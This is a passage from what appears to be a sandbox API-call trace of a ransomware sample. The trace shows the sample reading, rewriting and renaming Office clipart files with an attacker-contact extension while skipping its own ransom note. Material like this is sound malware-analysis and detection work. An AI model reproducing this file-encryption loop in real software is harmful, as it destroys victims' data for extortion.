Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152626.wmf.[evil@cock.lu].evil")) returned 1 [0146.834] ??_V@YAXPEAX@Z () returned 0x1 [0146.837] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF", dwFileAttributes=0x200) returned 0 [0146.837] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.837] wcsstr (_Str="J0152628.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.837] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF") returned 69 [0146.837] wcscmp (_String1="J0152628.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.837] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152628.WMF") returned 0x0 [0146.837] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF") returned 0x45 [0146.837] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152628.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.839] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x785c, lpOverlapped=0x0) returned 1 [0146.842] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.842] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.842] _errno () returned 0x84b1160840 [0146.842] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.842] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x7860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7860, lpOverlapped=0x0) returned 1 [0146.842] CloseHandle (hObject=0x1a8) returned 1 [0146.843] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.843] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.843] __uncaught_exception () returned 0x84b1160800 [0146.843] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.843] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152628.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152628.wmf.[evil@cock.lu].evil")) returned 1 [0146.844] ??_V@YAXPEAX@Z () returned 0x1 [0146.847] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF", dwFileAttributes=0x200) returned 0 [0146.847] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.847] wcsstr (_Str="J0152688.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.847] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF") returned 69 [0146.847] wcscmp (_String1="J0152688.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.847] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152688.WMF") returned 0x0 [0146.847] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF") returned 0x45 [0146.847] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152688.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.849] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8774, lpOverlapped=0x0) returned 1 [0146.852] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.852] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.852] _errno () returned 0x84b1160840 [0146.852] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.852] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x8780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8780, lpOverlapped=0x0) returned 1 [0146.853] CloseHandle (hObject=0x1a8) returned 1 [0146.853] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.853] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.853] __uncaught_exception () returned 0x84b1160800 [0146.853] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.853] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152688.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152688.wmf.[evil@cock.lu].evil")) returned 1 [0146.854] ??_V@YAXPEAX@Z () returned 0x1 [0146.857] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF", dwFileAttributes=0x200) returned 0 [0146.857] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.857] wcsstr (_Str="J0152690.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.857] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF") returned 69 [0146.857] wcscmp (_String1="J0152690.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.857] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152690.WMF") returned 0x0 [0146.857] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF") returned 0x45 [0146.857] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152690.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.859] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4f4, lpOverlapped=0x0) returned 1 [0146.862] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.862] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.863] _errno () returned 0x84b1160840 [0146.863] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.863] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x500, lpOverlapped=0x0) returned 1 [0146.863] CloseHandle (hObject=0x1a8) returned 1 [0146.863] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.863] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.863] __uncaught_exception () returned 0x84b1160800 [0146.863] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.863] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152690.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152690.wmf.[evil@cock.lu].evil")) returned 1 [0146.864] ??_V@YAXPEAX@Z () returned 0x1 [0146.867] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF", dwFileAttributes=0x200) returned 0 [0146.867] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.867] wcsstr (_Str="J0152694.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.867] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF") returned 69 [0146.867] wcscmp (_String1="J0152694.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.867] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152694.WMF") returned 0x0 [0146.867] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF") returned 0x45 [0146.867] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152694.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.869] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x544, lpOverlapped=0x0) returned 1 [0146.872] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.872] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.872] _errno () returned 0x84b1160840 [0146.872] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.872] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x560, lpOverlapped=0x0) returned 1 [0146.872] CloseHandle (hObject=0x1a8) returned 1 [0146.872] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.872] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.873] __uncaught_exception () returned 0x84b1160800 [0146.873] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.873] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152694.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152694.wmf.[evil@cock.lu].evil")) returned 1 [0146.873] ??_V@YAXPEAX@Z () returned 0x1 [0146.877] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152694.WMF", dwFileAttributes=0x200) returned 0 [0146.877] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.877] wcsstr (_Str="J0152696.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.877] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF") returned 69 [0146.877] wcscmp (_String1="J0152696.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.877] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152696.WMF") returned 0x0 [0146.877] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF") returned 0x45 [0146.877] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152696.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.879] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c98, lpOverlapped=0x0) returned 1 [0146.896] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.896] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.896] _errno () returned 0x84b1160840 [0146.896] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.896] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ca0, lpOverlapped=0x0) returned 1 [0146.896] CloseHandle (hObject=0x1a8) returned 1 [0146.897] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.897] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.897] __uncaught_exception () returned 0x84b1160800 [0146.897] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.897] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152696.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152696.wmf.[evil@cock.lu].evil")) returned 1 [0146.898] ??_V@YAXPEAX@Z () returned 0x1 [0146.900] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152696.WMF", dwFileAttributes=0x200) returned 0 [0146.901] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.901] wcsstr (_Str="J0152698.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.901] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF") returned 69 [0146.901] wcscmp (_String1="J0152698.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.901] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152698.WMF") returned 0x0 [0146.901] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF") returned 0x45 [0146.901] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152698.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.902] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4b8, lpOverlapped=0x0) returned 1 [0146.905] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.905] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.905] _errno () returned 0x84b1160840 [0146.905] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.905] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4c0, lpOverlapped=0x0) returned 1 [0146.905] CloseHandle (hObject=0x1a8) returned 1 [0146.905] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.906] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.906] __uncaught_exception () returned 0x84b1160800 [0146.906] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.906] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152698.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152698.wmf.[evil@cock.lu].evil")) returned 1 [0146.907] ??_V@YAXPEAX@Z () returned 0x1 [0146.909] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152698.WMF", dwFileAttributes=0x200) returned 0 [0146.909] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.909] wcsstr (_Str="J0152702.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.909] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 69 [0146.909] wcscmp (_String1="J0152702.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.909] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152702.WMF") returned 0x0 [0146.909] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF") returned 0x45 [0146.909] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.911] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4b8, lpOverlapped=0x0) returned 1 [0146.914] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.914] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.914] _errno () returned 0x84b1160840 [0146.914] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.915] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4c0, lpOverlapped=0x0) returned 1 [0146.915] CloseHandle (hObject=0x1a8) returned 1 [0146.915] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.915] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.915] __uncaught_exception () returned 0x84b1160800 [0146.915] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.915] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152702.wmf.[evil@cock.lu].evil")) returned 1 [0146.916] ??_V@YAXPEAX@Z () returned 0x1 [0146.918] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152702.WMF", dwFileAttributes=0x200) returned 0 [0146.919] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.919] wcsstr (_Str="J0152704.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0146.919] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 69 [0146.919] wcscmp (_String1="J0152704.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0146.919] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0152704.WMF") returned 0x0 [0146.919] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF") returned 0x45 [0146.919] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0146.920] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x674, lpOverlapped=0x0) returned 1 [0146.928] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.928] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0146.928] _errno () returned 0x84b1160840 [0146.928] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.928] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x680, lpOverlapped=0x0) returned 1 [0146.928] CloseHandle (hObject=0x1a8) returned 1 [0146.928] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0146.929] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0146.929] __uncaught_exception () returned 0x84b1160800 [0146.929] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0146.929] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152704.wmf.[evil@cock.lu].evil")) returned 1 [0146.930] ??_V@YAXPEAX@Z () returned 0x1 [0146.933] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152704.WMF", dwFileAttributes=0x200) returned 0 [0146.933] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0146.933] wcsstr (_Str="J0152708.WMF", 